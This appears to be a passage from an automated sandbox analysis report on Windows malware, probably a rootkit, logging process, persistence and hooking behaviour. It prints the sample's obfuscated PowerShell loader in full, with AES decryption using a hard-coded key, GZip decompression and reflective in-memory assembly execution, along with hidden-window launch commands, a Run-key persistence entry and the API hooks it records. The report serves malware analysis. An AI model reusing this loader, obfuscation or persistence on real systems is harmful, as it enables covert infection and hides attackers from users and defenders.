+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)
+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000002527DEE1E3C
Source: C:\Windows\System32\cmd.exe Code function: 20_3_000002527DECA7DD push rcx; retf 003Fh 20_3_000002527DECA7DE
Source: C:\Windows\System32\conhost.exe Code function: 21_3_00000286D7CFA7DD push rcx; retf 003Fh 21_3_00000286D7CFA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAAB8671C7 push ebp; retf 39_2_00007FFAAB8671C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_00007FFAABA171BA push ecx; retf 39_2_00007FFAABA171CC
Source: C:\Windows\System32\conhost.exe Code function: 40_3_000001D54781A7DD push rcx; retf 003Fh 40_3_000001D54781A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 41_3_000001EF0920A7DD push rcx; retf 003Fh 41_3_000001EF0920A7DE
Source: C:\Windows\System32\winlogon.exe Code function: 42_3_000001CA7D1CA7DD push rcx; retf 003Fh 42_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe Code function: 43_3_0000017D2DD3A7DD push rcx; retf 003Fh 43_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exe Code function: 44_3_0000022F4B93A7DD push rcx; retf 003Fh 44_3_0000022F4B93A7DE
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CEA7DD push rcx; retf 003Fh 45_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exe Code function: 45_3_00000262F1CBA7DD push rcx; retf 003Fh 45_3_00000262F1CBA7DE
Source: C:\Windows\System32\svchost.exe Code function: 46_3_0000023942AFA7DD push rcx; retf 003Fh 46_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exe Code function: 47_3_000001EF056BA7DD push rcx; retf 003Fh 47_3_000001EF056BA7DE

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
